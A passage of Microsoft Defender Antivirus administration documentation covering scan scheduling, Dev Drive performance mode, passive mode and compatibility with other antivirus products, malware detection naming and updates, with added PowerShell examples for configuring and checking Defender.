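    Select-Object ScanParameters, ScanScheduleDay, ScanScheduleTime,
        RandomizeScheduleTaskTimes, ScanOnlyIfIdleEnabled,
        RemediationScheduleDay, RemediationScheduleTime, ScanScheduleQuickScanTime

# Local: invoke the static Set method. Unlike Set-MpPreference, WMI takes the raw
# numeric codes (ScanParameters 1 = quick, 2 = full; days 0 = every day, 1 = Sunday
# ... 7 = Saturday, 8 = never), not the enum names. Don't name this $args; that is a
# PowerShell automatic variable.
$setArgs = @{
    ScanParameters             = [byte]2            # full scan
    ScanScheduleDay            = [byte]7            # Saturday
    ScanScheduleTime           = [TimeSpan]'02:00:00'   # assumed to map to the CIM interval type
    RandomizeScheduleTaskTimes = $true
    ScanOnlyIfIdleEnabled      = $true
    RemediationScheduleDay     = [byte]0            # every day
    RemediationScheduleTime    = [TimeSpan]'03:00:00'
    ScanScheduleQuickScanTime  = [TimeSpan]'12:30:00'
}
$result = Invoke-CimMethod -Namespace $ns -ClassName MSFT_MpPreference -MethodName Set -Arguments $setArgs
if ($result.ReturnValue -ne 0) {
    Write-Warning "Set returned $($result.ReturnValue); check the WMIv2 API reference for the code."
}

# Remote: the same call against another device over WinRM (host name is illustrative).
$session = New-CimSession -ComputerName 'srv01.corp.example'
try {
    Invoke-CimMethod -CimSession $session -Namespace $ns -ClassName MSFT_MpPreference `
        -MethodName Set -Arguments @{ ScanOnlyIfIdleEnabled = $true }
    Get-CimInstance -CimSession $session -Namespace $ns -ClassName MSFT_MpPreference |
        Select-Object PSComputerName, ScanOnlyIfIdleEnabled, ScanScheduleDay
}
finally {
    Remove-CimSession $session
}
```

Set-MpPreference is a thin wrapper over this class, so anything the cmdlet accepts can
be set here; the difference is that CIM lets you reuse one session for many devices and
gives you the method's return code to act on.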

Use limited periodic scanning in
Microsoft Defender Antivirus
Article • 02/18/2024

Applies to:

Microsoft Defender for Endpoint Plan 1

Microsoft Defender for Endpoint Plan 2

Microsoft Defender Antivirus

Microsoft Defender for Individual

Platforms

Windows

7 Note

Microsoft doesn't support using this feature in enterprise environments. This
feature only uses a limited subset of the Microsoft Defender Antivirus capabilities
to detect malware, and can't detect most malware and potentially unwanted
software. Management of the feature isn't supported, the feature can't be
enabled or disabled through policies, and reporting capabilities are extremely
limited. Microsoft recommends that enterprise organizations choose a primary
antivirus/antimalware solution, and use it exclusively.

Limited periodic scanning is a special type of threat detection and remediation that can
be enabled when another antivirus product is installed on a Windows 10 or Windows 11
device. It can only be enabled in certain situations. For more information about limited
periodic scanning and how Microsoft Defender Antivirus works with other antivirus
products, see Microsoft Defender Antivirus compatibility.

How to enable limited periodic scanning

By default, Microsoft Defender Antivirus enables itself on a Windows 10 or a Windows
11 device if there is no other antivirus product installed, or if the other product is
out-of-date, expired, or not working correctly. If Microsoft Defender Antivirus is
enabled, the usual options to configure it are available on that device.

If another antivirus product is installed and working correctly, Microsoft Defender
Antivirus disables itself. In this case, the Windows Security app changes the Virus &
threat protection section to show status about the antivirus product, and provides a link
to the product's configuration options.

Underneath the name of a non-Microsoft antivirus product, a link appears as Microsoft
Defender Antivirus options. Select this link to show the toggle that enables limited
periodic scanning. Sliding the switch to On shows the standard Microsoft Defender
Antivirus options underneath the non-Microsoft antivirus product. The limited periodic
scanning option appears at the bottom of the page.

Related articles
Configure behavioral, heuristic, and real-time protection
Microsoft Defender Antivirus in Windows 10

Protect Dev Drive using performance
mode
Article • 02/22/2024

7 Note

Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business
Microsoft Defender Antivirus

Platforms

Windows 11

What is performance mode

Performance mode is available on Windows 11 as a Microsoft Defender Antivirus
capability. Performance mode reduces the performance impact of Microsoft Defender
Antivirus scans for files stored on a designated Dev Drive. The goal of performance
mode is to improve functional performance for developers who use Windows 11 devices.

It's important to note that performance mode can run only on Dev Drive. Additionally,
real-time protection must be turned on for performance mode to function. Enabling this
feature on a Dev Drive doesn't change standard real-time protection running on
volumes with operating systems or other volumes formatted FAT32 or NTFS.

Dev Drive
Dev Drive is a new form of storage volume available to improve performance for key
developer workloads. It builds on ReFS technology to employ targeted file system
optimizations and provide more control over storage volume settings and security,
including trust designation, antivirus configuration, and administrative control over
which filters are attached.
For more information about Dev Drive, see: Set up a Dev Drive on Windows 11.

Performance mode compared to real-time protection

By default, to give the best possible performance, creating a Dev Drive automatically
grants trust in the new volume. A trusted Dev Drive volume causes real-time protection
to run in a special asynchronous performance mode for that volume. Running in
performance mode provides a balance between threat protection and performance. The
balance is achieved by deferring security scans until after the open file operation has
completed, instead of performing the security scan synchronously while the file
operation is being processed. This mode of performing security scans inherently
provides faster performance, but with less protection. However, enabling performance
mode provides significantly better protection than other performance tuning methods
such as folder exclusions, which skip security scans altogether.

7 Note

To enable performance mode, real-time protection must be turned on.

The following table summarizes performance mode synchronous and asynchronous
scan behavior.

Performance mode state | Scan type | Description | Summary
Not enabled (Off) | Synchronous (real-time protection) | Opening a file initiates a real-time protection scan. | Open now, scan now.
Enabled (On) | Asynchronous | File open operations are scanned asynchronously. | Open now, scan later.

An untrusted Dev Drive doesn't have the same benefits as a trusted Dev Drive. Security
runs in synchronous, real-time protection mode when a Dev Drive is untrusted. Real-time
protection scans can affect performance.

Microsoft Defender Antivirus requirements for performance mode

1. Review the requirements that are specific to Dev Drive. See Set up a Dev Drive on
Windows 11.

2. Make sure Microsoft Defender Antivirus is up to date:

Antimalware platform version: 4.18.2303.8 (or later)
Antimalware security intelligence version: 1.385.1455.0 (or later)
Real-time protection is turned on

Manage performance mode

1. Performance mode can only run on a trusted Dev Drive and is enabled by default
when a new Dev Drive is created. For more information, see Understanding
security risks and trust in relation to Dev Drive.

2. Enforce the Microsoft Defender Antivirus performance mode by using Intune,
Group Policy, or PowerShell.

Intune

Enable performance mode via the OMA-URI setting shown in the following table.

Setting | Value
OMA-URI | ./Device/Vendor/MSFT/Defender/Configuration/PerformanceModeStatus
Data type | Integer
Value | 1

Group Policy

1. In GPMC.msc or GPedit.msc, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Real-time
Protection.

2. Double-click Configure performance mode status.

3. Select Enabled.

4. Select Apply, and then select OK.

PowerShell

1. Open PowerShell as an administrator on the device.

2. Type Set-MpPreference -PerformanceModeStatus Enabled, and then press Enter.

Verify performance mode is enabled

To verify that Dev Drive and Defender performance mode are enabled, follow these steps:

1. In the Windows Security app, go to Virus & threat protection settings > Manage
settings, and verify that Dev Drive protection is enabled.

2. Select See volumes.

Drive | Status
C: | Since the system drive (for example, C: or D:) is formatted with NTFS, it isn't eligible for Defender performance mode.
D: | Dev Drive is enabled, but Defender performance mode isn't enabled.
F: | Dev Drive is enabled, and Defender performance mode is enabled.
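
The following script is an added example and is not part of the Microsoft article. It
does from PowerShell what the Manage and Verify sections above describe: it checks the
platform, security intelligence, and real-time protection requirements, enables
performance mode, reads the setting back, and then checks the trust state of the Dev
Drive volume, because performance mode only takes effect on a trusted Dev Drive.
fsutil devdrv is the built-in Dev Drive management command; the drive letter is
illustrative. Run it elevated on Windows 11.

```powershell
# Added example (not from the Microsoft article): enable and verify performance mode
# on a Dev Drive from PowerShell. Drive letter is illustrative. Run elevated.

# Minimum versions the article gives for performance mode.
$minPlatform  = [version]'4.18.2303.8'
$minSignature = [version]'1.385.1455.0'

$status = Get-MpComputerStatus
if ([version]$status.AMProductVersion -lt $minPlatform) {
    Write-Warning "Platform $($status.AMProductVersion) is older than $minPlatform; update the platform first."
}
if ([version]$status.AntivirusSignatureVersion -lt $minSignature) {
    Write-Warning "Security intelligence $($status.AntivirusSignatureVersion) is older than $minSignature."
}
if (-not $status.RealTimeProtectionEnabled) {
    throw 'Real-time protection is off; performance mode cannot run without it.'
}

# Enable performance mode (the PowerShell step above) and read it back from the engine.
Set-MpPreference -PerformanceModeStatus Enabled
$mode = (Get-MpPreference).PerformanceModeStatus
"PerformanceModeStatus: $mode"

# The setting alone is not enough: the volume must be a trusted Dev Drive. NTFS volumes
# (such as the system drive) are never eligible, and an untrusted Dev Drive falls back
# to synchronous real-time scanning. Query the volume's Dev Drive state.
$devDrive = 'D:'
$fs = (Get-Volume -DriveLetter $devDrive.TrimEnd(':')).FileSystem
if ($fs -ne 'ReFS') {
    Write-Warning "$devDrive is $fs, not ReFS; it cannot be a Dev Drive and performance mode will not apply."
}
fsutil devdrv query $devDrive

# If the query reports the volume as untrusted, mark it trusted (elevated):
# fsutil devdrv trust D:
```

Checking the volume separately matters because the Windows Security app's See volumes
view is where the mismatch shows up: a Dev Drive that is present but not trusted reads
"Defender performance mode isn't enabled" even though the Defender setting itself is on.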

See also
Set up a Dev Drive on Windows 11

Microsoft Defender Antivirus
compatibility with other security
products
Article • 12/12/2023

Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Platforms

Windows

Microsoft Defender Antivirus is available on endpoints running the following versions of
Windows:

Windows 11
Windows 10
Windows Server 2022
Windows Server 2019
Windows Server, version 1803, or newer
Windows Server 2016

Microsoft Defender Antivirus is also available for older versions of Windows under
certain conditions.

On Windows Server 2012 R2, when onboarded using the modern, unified solution,
Microsoft Defender Antivirus is installed in Active mode.

On Windows 8.1, with System Center Endpoint Protection, enterprise-level
endpoint antivirus protection is offered and managed through Microsoft Endpoint
Configuration Manager.

On consumer devices on Windows 8.1, Windows Defender is available (although it
doesn't provide enterprise-level management).

If you're using non-Microsoft antivirus/antimalware software, you might be able to run
Microsoft Defender Antivirus alongside the other antivirus solution. This article describes
what happens with Microsoft Defender Antivirus and non-Microsoft
antivirus/antimalware software, with and without Microsoft Defender for Endpoint.

Antivirus protection without Defender for
Endpoint
This section describes what happens when you use Microsoft Defender Antivirus
alongside non-Microsoft antivirus/antimalware products on endpoints that aren't
onboarded to Defender for Endpoint.

In general, Microsoft Defender Antivirus doesn't run in passive mode on devices that
aren't onboarded to Defender for Endpoint.

The following table summarizes what to expect:

Windows version | Primary antivirus/antimalware solution | Microsoft Defender Antivirus state
Windows 10, Windows 11 | Microsoft Defender Antivirus | Active mode
Windows 10, Windows 11 | A non-Microsoft antivirus/antimalware solution | Disabled mode (happens automatically). Note that in Windows 11, if Smart App Control is enabled, Microsoft Defender Antivirus goes into passive mode.
Windows Server 2022, Windows Server 2019, Windows Server version 1803 or newer, Windows Server 2016, Windows Server 2012 R2 | Microsoft Defender Antivirus | Active mode
Windows Server 2022, Windows Server 2019, Windows Server version 1803 or newer, Windows Server 2016 | A non-Microsoft antivirus/antimalware solution | Disabled (set manually; see the note that follows this table)

7 Note

On Windows Server, if you're running a non-Microsoft antivirus product, you can
uninstall Microsoft Defender Antivirus by using the following PowerShell cmdlet (as
an administrator): Uninstall-WindowsFeature Windows-Defender. Restart your server
to finish removing Microsoft Defender Antivirus. On Windows Server 2016, you
might see Windows Defender Antivirus instead of Microsoft Defender Antivirus.

If the device is onboarded to Microsoft Defender for Endpoint, you can use Microsoft
Defender Antivirus in passive mode as described later in this article.

Microsoft Defender Antivirus and non-Microsoft antivirus/antimalware solutions

7 Note

In general, Microsoft Defender Antivirus can be set to passive mode only on
endpoints that are onboarded to Defender for Endpoint.

Whether Microsoft Defender Antivirus runs in active mode, passive mode, or is disabled
depends on several factors, such as:

Which version of Windows is installed on an endpoint
Whether Microsoft Defender Antivirus is the primary antivirus/antimalware solution
on the endpoint
Whether the endpoint is onboarded to Defender for Endpoint

The following table summarizes the state of Microsoft Defender Antivirus in several
scenarios.

Antivirus/antimalware solution | Onboarded to Defender for Endpoint? | Microsoft Defender Antivirus state | Smart App Control state
Microsoft Defender Antivirus | Yes | Active mode | N/A
Microsoft Defender Antivirus | No | Active mode | On, Evaluation, or Off
A non-Microsoft antivirus/antimalware solution | Yes | Passive mode (automatically) | N/A
A non-Microsoft antivirus/antimalware solution | No | Disabled (automatically) | Evaluation or On

7 Note

Smart App Control is a consumer-only product that's used on new Windows 11
installs. It can run alongside your antivirus software and block apps that are
considered to be malicious or untrusted. Learn more about Smart App Control.

Windows Server and passive mode

On Windows Server 2019, Windows Server, version 1803 or newer, Windows Server
2016, or Windows Server 2012 R2, Microsoft Defender Antivirus doesn't enter passive
mode automatically when you install a non-Microsoft antivirus product. In those cases,
set Microsoft Defender Antivirus to passive mode to prevent problems caused by having
multiple antivirus products installed on a server. You can set Microsoft Defender
Antivirus to passive mode using a registry key as follows:

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: ForceDefenderPassiveMode
Type: REG_DWORD
Value: 1

You can view your protection status in PowerShell by using the command
Get-MpComputerStatus. Check the value for AMRunningMode. You should see Normal,
Passive, or EDR Block Mode if Microsoft Defender Antivirus is enabled on the endpoint.

For passive mode to work on endpoints running Windows Server 2016 and Windows
Server 2012 R2, those endpoints must be onboarded with the modern, unified solution
described in Onboard Windows servers.

On Windows Server 2016, Windows Server 2012 R2, Windows Server version 1803 or
newer, Windows Server 2019, and Windows Server 2022, if you're using a non-Microsoft
antivirus product on an endpoint that isn't onboarded to Microsoft Defender for
Endpoint, disable or uninstall Microsoft Defender Antivirus manually to prevent problems
caused by having multiple antivirus products installed on a server. However, Defender
for Endpoint includes capabilities that further extend the antivirus protection that is
installed on your endpoint. If you have Defender for Endpoint, you can benefit from
running Microsoft Defender Antivirus alongside another antivirus solution.

For example, Endpoint detection and response (EDR) in block mode provides added
protection from malicious artifacts even if Microsoft Defender Antivirus isn't the primary
antivirus product. Such capabilities require Microsoft Defender Antivirus to be installed
and running in passive mode or active mode.

 Tip

On Windows Server 2016, you might see Windows Defender Antivirus instead of
Microsoft Defender Antivirus.

Requirements for Microsoft Defender Antivirus to run in passive mode

In order for Microsoft Defender Antivirus to run in passive mode, endpoints must meet
the following requirements:

Operating system: Windows 10 or newer; Windows Server 2022, Windows Server
2019, or Windows Server, version 1803, or newer
(Windows Server 2012 R2 and Windows Server 2016 if onboarded using the
modern, unified solution).
Microsoft Defender Antivirus must be installed.
Another non-Microsoft antivirus/antimalware product must be installed and used
as the primary antivirus solution.
Endpoints must be onboarded to Defender for Endpoint.

) Important

Microsoft Defender Antivirus is only available on devices running Windows 10
and 11, Windows Server 2022, Windows Server 2019, Windows Server, version
1803 or newer, Windows Server 2016, and Windows Server 2012 R2.
Passive mode is only supported on Windows Server 2012 R2 and 2016 when the
device is onboarded using the modern, unified solution.
In Windows 8.1, enterprise-level endpoint antivirus protection is offered as
System Center Endpoint Protection, which is managed through Microsoft
Endpoint Configuration Manager.
Windows Defender is also offered for consumer devices on Windows 8.1,
although Windows Defender doesn't provide enterprise-level management.

How Microsoft Defender Antivirus affects Defender for Endpoint functionality

Defender for Endpoint affects whether Microsoft Defender Antivirus can run in passive
mode. And, the state of Microsoft Defender Antivirus can affect certain capabilities in
Defender for Endpoint. For example, real-time protection works when Microsoft
Defender Antivirus is in active or passive mode, but not when Microsoft Defender
Antivirus is disabled or uninstalled.

) Important

The table in this section summarizes the features and capabilities that are
actively working or not, according to whether Microsoft Defender Antivirus is
in active mode, passive mode, or disabled/uninstalled. This table is designed to
be informational only.
Do not turn off capabilities, such as real-time protection, cloud-delivered
protection, or limited periodic scanning if you are using Microsoft Defender
Antivirus in passive mode, or if you are using EDR in block mode, which works
behind the scenes to detect and remediate malicious artifacts that were
detected post-breach.

Protection | Microsoft Defender Antivirus (Active mode) | Microsoft Defender Antivirus (Passive mode) | Microsoft Defender Antivirus (Disabled or uninstalled)
Real-time protection | Yes | See note 1 | No
Cloud-delivered protection | Yes | No | No
Network protection | Yes | No | No
Attack surface reduction rules | Yes | No | No
File scanning and detection information | Yes | Yes (see note 2) | No
Threat remediation | Yes | See note 3 | No
Security intelligence updates | Yes | Yes (see note 4) | No
Data Loss Prevention | Yes | Yes | No
Controlled folder access | Yes | No | No
Web content filtering | Yes | See note 5 | No
Device control | Yes | Yes | No
PUA protection | Yes | No | No

Notes about protection states

1. In general, when Microsoft Defender Antivirus is in passive mode, real-time
protection doesn't provide any blocking or enforcement, even though it's enabled
and in passive mode.

2. When Microsoft Defender Antivirus is in passive mode, scans aren't scheduled. If
scans are scheduled in your configuration, the schedule is ignored. However, every
30 days (default number of days) a quick catch-up scan continues to occur unless
"Turn on catch-up quick scan" is set to disabled. Scan tasks that are set up in
Windows Task Scheduler continue to run according to their schedule. If you have
scheduled tasks, you can remove them, if preferred.

3. When Microsoft Defender Antivirus is in passive mode, it doesn't remediate
threats. However, Endpoint detection and response (EDR) in block mode can
remediate threats. In this case, you might see alerts showing Microsoft Defender
Antivirus as a source, even when Microsoft Defender Antivirus is in passive mode.

4. The security intelligence update cadence is controlled by Windows Update settings
only. Defender-specific update scheduler settings (daily/weekly at a specific time,
interval-based) only work when Microsoft Defender Antivirus is in active mode.
They're ignored in passive mode.

5. When Microsoft Defender Antivirus is in passive mode, web content filtering only
works with the Microsoft Edge browser.

) Important

Endpoint data loss prevention protection continues to operate normally
when Microsoft Defender Antivirus is in either active or passive mode.

Don't disable, stop, or modify any of the associated services that are used by
Microsoft Defender Antivirus, Defender for Endpoint, or the Windows Security
app. This recommendation includes the wscsvc, SecurityHealthService,
MsSense, Sense, WinDefend, and MsMpEng services and processes. Manually
modifying these services can cause severe instability on your devices and can
make your network vulnerable. Disabling, stopping, or modifying those
services can also cause problems when using non-Microsoft antivirus
solutions and how their information is displayed in the Windows Security
app.

In Defender for Endpoint, you can turn EDR in block mode on, even if
Microsoft Defender Antivirus isn't your primary antivirus solution. EDR in
block mode detects and remediates malicious items that are found on the
device (post breach). To learn more, see EDR in block mode.

How to confirm the state of Microsoft Defender Antivirus

You can use one of several methods to confirm the state of Microsoft Defender
Antivirus. You can:

Use the Windows Security app to identify your antivirus app.
Use Task Manager to confirm that Microsoft Defender Antivirus is running.
Use Windows PowerShell to confirm that Microsoft Defender Antivirus is running.
Use Windows PowerShell to confirm that antivirus protection is running.

) Important

Beginning with platform version 4.18.2208.0 and later: If a server has been
onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender"
group policy setting no longer completely disables Windows Defender Antivirus on
Windows Server 2012 R2 and later. Instead, it places Microsoft Defender Antivirus
into passive mode. In addition, tamper protection allows a switch to active
mode, but not to passive mode.

If "Turn off Windows Defender" is already in place before onboarding to
Microsoft Defender for Endpoint, Microsoft Defender Antivirus remains
disabled.
To switch Microsoft Defender Antivirus to passive mode, even if it was
disabled before onboarding, you can apply the ForceDefenderPassiveMode
configuration with a value of 1. To place it into active mode, switch this value
to 0 instead.

Note the modified logic for ForceDefenderPassiveMode when tamper protection is
enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper
protection prevents it from going back into passive mode even when
ForceDefenderPassiveMode is set to 1.

Use the Windows Security app to identify your antivirus app

1. On a Windows device, open the Windows Security app.

2. Select Virus & threat protection.

3. Under Who's protecting me? select Manage providers.

4. On the Security providers page, under Antivirus, you should see Microsoft
Defender Antivirus is turned on.

Use Task Manager to confirm that Microsoft Defender Antivirus is running

1. On a Windows device, open the Task Manager app.

2. Select the Details tab.

3. Look for MsMpEng.exe in the list.

Use Windows PowerShell to confirm that Microsoft Defender Antivirus is running

Note

Use this procedure only to confirm whether Microsoft Defender Antivirus is running
on an endpoint.

1. On a Windows device, open Windows PowerShell.

2. Run the following PowerShell cmdlet: Get-Process

3. Review the results. You should see MsMpEng.exe if Microsoft Defender Antivirus is
enabled.

Use Windows PowerShell to confirm that antivirus protection is running

Note

Use this procedure only to confirm whether antivirus protection is enabled on an
endpoint.

1. On a Windows device, open Windows PowerShell.

2. Run the following PowerShell cmdlet: Get-MpComputerStatus | select AMRunningMode

3. Review the results. You should see Normal, Passive, or EDR Block Mode if antivirus
protection is enabled on the endpoint.

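The Task Manager and PowerShell checks above combined into one script that reports the state of Microsoft Defender Antivirus on the local device. This is an added example and not part of the Microsoft article; it assumes the built-in Defender PowerShell module (Get-MpComputerStatus) is present, which is the case on supported Windows clients and servers, and reads the AMRunningMode property the article refers to together with the version and signature-date properties that the same cmdlet returns. The function names Get-DefenderAvState and Test-DefenderAvProtecting are the example's own. Run it in an elevated Windows PowerShell session.

```powershell
# Added example (not from the Microsoft article): perform the Task Manager and
# PowerShell checks described above and report the result as one object.
# Assumes the built-in Defender module (Get-MpComputerStatus) is available.

function Get-DefenderAvState {
    # Task Manager check: is the antimalware service executable (MsMpEng.exe) running?
    $engine = Get-Process -Name 'MsMpEng' -ErrorAction SilentlyContinue

    # PowerShell check: ask the platform how it is running.
    $status = Get-MpComputerStatus

    $signatureAgeDays = $null
    if ($status.AntivirusSignatureLastUpdated) {
        $signatureAgeDays = ((Get-Date) - $status.AntivirusSignatureLastUpdated).Days
    }

    [pscustomobject]@{
        ComputerName              = $env:COMPUTERNAME
        MsMpEngRunning            = [bool]$engine
        AMServiceEnabled          = $status.AMServiceEnabled
        AMRunningMode             = $status.AMRunningMode
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        PlatformVersion           = $status.AMProductVersion
        EngineVersion             = $status.AMEngineVersion
        SignatureVersion          = $status.AntivirusSignatureVersion
        SignatureAgeDays          = $signatureAgeDays
    }
}

function Test-DefenderAvProtecting {
    # The article treats Normal, Passive and EDR Block Mode as "antivirus
    # protection enabled". The exact strings vary slightly between platform
    # versions (for example "Passive Mode"), so the match is deliberately loose.
    param([string]$AMRunningMode)

    [bool]($AMRunningMode -match '^(Normal|EDR Block Mode|.*Passive.*)$')
}

$state = Get-DefenderAvState
$state | Format-List

if (-not $state.MsMpEngRunning) {
    Write-Warning 'MsMpEng.exe is not running: Microsoft Defender Antivirus is disabled or uninstalled.'
}
elseif (-not (Test-DefenderAvProtecting -AMRunningMode $state.AMRunningMode)) {
    Write-Warning "AMRunningMode is '$($state.AMRunningMode)'; verify the provider in the Windows Security app."
}
elseif ($state.SignatureAgeDays -gt 7) {
    # Passive mode and EDR in block mode still depend on current security intelligence.
    Write-Warning "Security intelligence is $($state.SignatureAgeDays) days old; run Update-MpSignature."
}
```

The seven-day threshold for stale security intelligence is the example's own choice; what matters is that the script warns even when the device is in passive mode, because, as the article says, the platform still needs its updates in that mode.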

More details about Microsoft Defender Antivirus states

The following sections describe what to expect when Microsoft Defender Antivirus is:

In active mode
In passive mode, or when EDR in block mode is turned on
Disabled or uninstalled

Active mode
In active mode, Microsoft Defender Antivirus is used as the antivirus app on the
machine. Settings that are configured by using Configuration Manager, Group Policy,
Microsoft Intune, or other management products apply. Files are scanned, threats are
remediated, and detection information is reported in your configuration tool (such as in
the Microsoft Intune admin center or the Microsoft Defender Antivirus app on the
endpoint).

Passive mode or EDR Block mode

In passive mode, Microsoft Defender Antivirus isn't used as the antivirus app, and
threats aren't remediated by Microsoft Defender Antivirus. However, Endpoint
detection and response (EDR) in block mode can remediate threats. Files are scanned by
EDR, and reports are provided for threat detections that are shared with the Defender
for Endpoint service. You might see alerts showing Microsoft Defender Antivirus as a
source, even when Microsoft Defender Antivirus is in passive mode.

When Microsoft Defender Antivirus is in passive mode, you can still manage updates for
Microsoft Defender Antivirus; however, you can't move Microsoft Defender Antivirus
into active mode if your devices have a non-Microsoft antivirus product that is providing
real-time protection from malware.

Make sure to get your antivirus and antimalware updates, even if Microsoft Defender
Antivirus is running in passive mode. See Manage Microsoft Defender Antivirus
updates and apply baselines. Passive mode is only supported on Windows Server 2012
R2 & 2016 when the machine is onboarded using the modern, unified solution.

Disabled or uninstalled

When disabled or uninstalled, Microsoft Defender Antivirus isn't used as the antivirus
app. Files aren't scanned and threats aren't remediated. Disabling or uninstalling
Microsoft Defender Antivirus isn't recommended in general; if possible, keep Microsoft
Defender Antivirus in passive mode if you're using a non-Microsoft
antimalware/antivirus solution.

In cases where Microsoft Defender Antivirus is disabled automatically, it can be
re-enabled automatically if the non-Microsoft antivirus/antimalware product expires, is
uninstalled, or otherwise stops providing real-time protection from viruses, malware, or
other threats. The automatic re-enabling of Microsoft Defender Antivirus helps to
ensure that antivirus protection is maintained on your endpoints.

You might also use limited periodic scanning, which works with the Microsoft Defender
Antivirus engine to periodically check for threats if you're using a non-Microsoft
antivirus app.

What about non-Windows devices?

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Microsoft Defender Antivirus on Windows clients
EDR in block mode
Learn about Endpoint data loss prevention

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Find malware detection names for Microsoft Defender for Endpoint
Article • 10/31/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

As malware naming schemes vary depending on who is first to report it, how it's
referred to in the media, and how some companies use specific naming conventions, it
can be confusing to understand how Defender for Endpoint detects specific malware
families.

Microsoft names specific malware according to the Computer Antivirus Research
Organization (CARO). For example, Microsoft detects the Sunburst cyberattack as
Trojan:MSIL/Solorigate.BR!dha.

To understand how Microsoft Defender for Endpoint detects specific malware families,
you can follow the steps in Find the detection name for a malware family.

Find the detection name for a malware family

To find the detection name of a malware family, you need to search the internet for the
malware name plus "hash".

1. Get the name of the malware family.
2. Search the web for malware family + cyberattack + hash to find the hash.
3. Look up the hash in VirusTotal.
4. Find the Microsoft row and how we name the malware.
5. Look up the malware name in the Microsoft Defender Security Intelligence website
(https://www.microsoft.com/en-us/wdsi/threats). You should see
Microsoft information and guidance specific to that malware.

For example, search for the "Sunburst cyberattack hash". One of the websites returned
in the search results should have the hash. In this example, the hash is
a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc. Then,
look up this hash in VirusTotal.

The results show the Microsoft row detects this malware as
Trojan:MSIL/Solorigate.BR!dha. When you look up this malware name in the Microsoft
Defender Security Intelligence website, you find information specific to that malware,
including technical details and mitigation steps.
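Steps 3 and 4 of the procedure, automated against a VirusTotal file report, as an added example that is not part of the Microsoft article. The $sampleReport JSON is constructed for this example and only follows the shape of a VirusTotal API v3 file object (data.attributes.last_analysis_results.<engine>.result); a real report would be fetched from the VirusTotal API with your own API key. The hash and the Microsoft detection name are the ones quoted above. The split of the CARO-style name into Type:Platform/Family.Variant!Suffix and the malware-encyclopedia URL pattern are the example's own assumptions; the article itself links only to https://www.microsoft.com/en-us/wdsi/threats.

```powershell
# Added example (not from the Microsoft article): pick the Microsoft row out of
# a VirusTotal-style file report and break the CARO name into its parts.

# Constructed sample that mirrors the shape of a VirusTotal API v3 file object.
# Vendor names other than Microsoft are placeholders.
$sampleReport = @'
{
  "data": {
    "id": "a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc",
    "type": "file",
    "attributes": {
      "last_analysis_results": {
        "Microsoft": { "category": "malicious",  "result": "Trojan:MSIL/Solorigate.BR!dha" },
        "VendorA":   { "category": "malicious",  "result": "Sunburst.Placeholder.Name" },
        "VendorB":   { "category": "undetected", "result": null }
      }
    }
  }
}
'@

function Get-MicrosoftDetectionName {
    # Return the Microsoft engine's detection name, or $null if Microsoft
    # did not detect the file or is missing from the report.
    param([Parameter(Mandatory)][string]$ReportJson)

    $report  = $ReportJson | ConvertFrom-Json
    $results = $report.data.attributes.last_analysis_results
    $row     = $results.PSObject.Properties['Microsoft']
    if (-not $row -or [string]::IsNullOrEmpty($row.Value.result)) { return $null }
    $row.Value.result
}

function ConvertFrom-CaroName {
    # Split a CARO-style name (Type:Platform/Family.Variant!Suffix) into its parts.
    # Variant and Suffix are optional.
    param([Parameter(Mandatory)][string]$Name)

    $pattern = '^(?<Type>[^:]+):(?<Platform>[^/]+)/(?<Family>[^.!]+)(?:\.(?<Variant>[^!]+))?(?:!(?<Suffix>.+))?$'
    if ($Name -notmatch $pattern) { throw "Not a CARO-style name: $Name" }

    [pscustomobject]@{
        Name     = $Name
        Type     = $Matches.Type
        Platform = $Matches.Platform
        Family   = $Matches.Family
        Variant  = $Matches.Variant
        Suffix   = $Matches.Suffix
        # Assumed URL pattern for the encyclopedia entry; the article links only to
        # https://www.microsoft.com/en-us/wdsi/threats.
        EncyclopediaUrl = 'https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=' +
                          [uri]::EscapeDataString($Name)
    }
}

$name = Get-MicrosoftDetectionName -ReportJson $sampleReport
if ($name) {
    ConvertFrom-CaroName -Name $name | Format-List
}
else {
    Write-Warning 'No Microsoft detection in this report.'
}
```

For the sample above the split yields Type Trojan, Platform MSIL, Family Solorigate, Variant BR and Suffix dha, which is the family name you would then search for in the Security Intelligence website.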

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Microsoft Defender Antivirus security intelligence and product updates
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender Antivirus

Platforms

Windows

Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have
the latest technology and features needed to protect against new malware and attack
techniques. Update your antivirus protection, even if Microsoft Defender Antivirus is
running in passive mode. This article includes information about the two types of
updates for keeping Microsoft Defender Antivirus current:

Security intelligence updates
Product updates

This article also includes:

Microsoft Defender Antivirus platform support
How to roll back an update (if necessary)
Platform version included with Windows 10 releases
Updates for Deployment Image Servicing and Management (DISM)

Tip

To see the most current engine, platform, and signature date, visit the Security
intelligence updates for Microsoft Defender Antivirus and other Microsoft
antimalware

Security intelligence updates

Microsoft Defender Antivirus uses cloud-delivered protection (also called the Microsoft
Advanced Protection Service, or MAPS) and periodically downloads dynamic security
intelligence updates to provide more protection. These dynamic updates don't take the
place of regular security intelligence updates via security intelligence update
